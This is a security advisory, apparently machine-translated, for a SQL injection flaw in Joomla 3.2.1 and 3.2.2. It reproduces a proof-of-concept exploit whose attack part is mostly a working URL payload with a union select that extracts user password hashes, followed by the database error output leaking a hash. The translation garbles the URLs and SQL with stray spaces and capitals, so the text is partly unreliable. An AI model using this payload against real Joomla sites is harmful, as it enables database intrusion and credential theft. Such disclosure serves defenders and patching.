Release date:
Updated on:
Affected Systems:
Joomla! Joomla! 3.2.2
Joomla! Joomla! 3.2.1
Description:
--------------------------------------------------------------------------------
Joomla! Is an Open Source Content Management System (CMS ).
Joomla 3.2.1 and 3.2.2 modules/mod_tags_similar/helper. the ModTagssimilarHelper: getList () method in the php script does not properly filter user input. This allows remote attackers to inject or operate SQL queries in the backend database.
<* Source: killall-9
Link: http://osvdb.org/show/osvdb/103126
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit Title: Joomla 3.2.1 SQL injection
# Date: 05/02/2014
# Exploit Author: kiall-9@mail.com
# Vendor Homepage: http://www.joomla.org/
# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip
# Version: 3.2.1 (default installation with Test sample data)
# Tested on: Virtualbox (debian) + apache
POC =>
Http: // localhost/Joomla_3.2.1/index. php/weblinks-categories? Id = \
Will cause an error:
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\) 'At line 3 SQL = SELECT 'T '. 'id' FROM 'k59cv _ tags' AS t inner join 'k59cv _ contentitem_tag_map 'AS m ON 'M '. 'tag _ id' = 'T '. 'id' AND 'M '. 'Type _ alias' = 'com _ weblinks. categories 'AND 'M '. 'content _ item_id 'IN (\) Array ([type] => 8 [message] => Undefined offset: 0 [file] =>/var/www/Joomla_3.2.1/libraries/joomla/filter/input. php [line] = & gt; 203)
I modified the original error. php file with this code --- <? Php print_r (error_get_last ();?> --- In order to obtain something useful .;-)
Now I can easily exploit this flaw:
Http: // localhost/Joomla_3.2.1/index. php/weblinks-categories? Id = 0% 20% 29% 20 union % 20 select % 20 password % 20 from % 20% 60k59cv_users % 60% 20 -- % 20% 29
And obtain the hash:
1054 Unknown column '$ P $ D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause 'SQL = SELECT 'M '. 'tag _ id', 'M '. 'Core _ content_id ', 'M '. 'content _ item_id ', 'M '. 'Type _ alias', COUNT ('tag _ id') AS 'Count', 'T '. 'access', 'T '. 'id', 'ct '. 'router ', 'cc '. 'Core _ title', 'cc '. 'Core _ alias', 'cc '. 'Core _ catid', 'cc '. 'Core _ language' FROM 'k59cv _ contentitem_tag_map 'AS 'M' inner join 'k59cv _ tags' AS 'T' ON m. tag_id = t. id inner join 'k59cv _ ucm_content 'AS 'cc' ON m. core_content_id = cc. core_content_id inner join 'k59cv _ content_types 'AS 'ct' ON m. type_alias = ct. type_alias WHERE 'M '. 'tag _ id' IN ($ P $ D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t. access IN (1, 1) AND ('M '. 'content _ item_id '<> 0) union select password from 'k59cv _ users' --) OR 'M '. 'Type _ alias' <> 'com _ weblinks. categories ') AND 'cc '. 'Core _ state' = 1 group by 'M '. 'Core _ content_id 'order BY 'Count' desc limit 0, 5
CheerZ>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Joomla!
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://developer.joomla.org/security/
Refer:
EDB-31459
URL: http://developer.joomla.org/security/578-20140301-core-sql-injection.html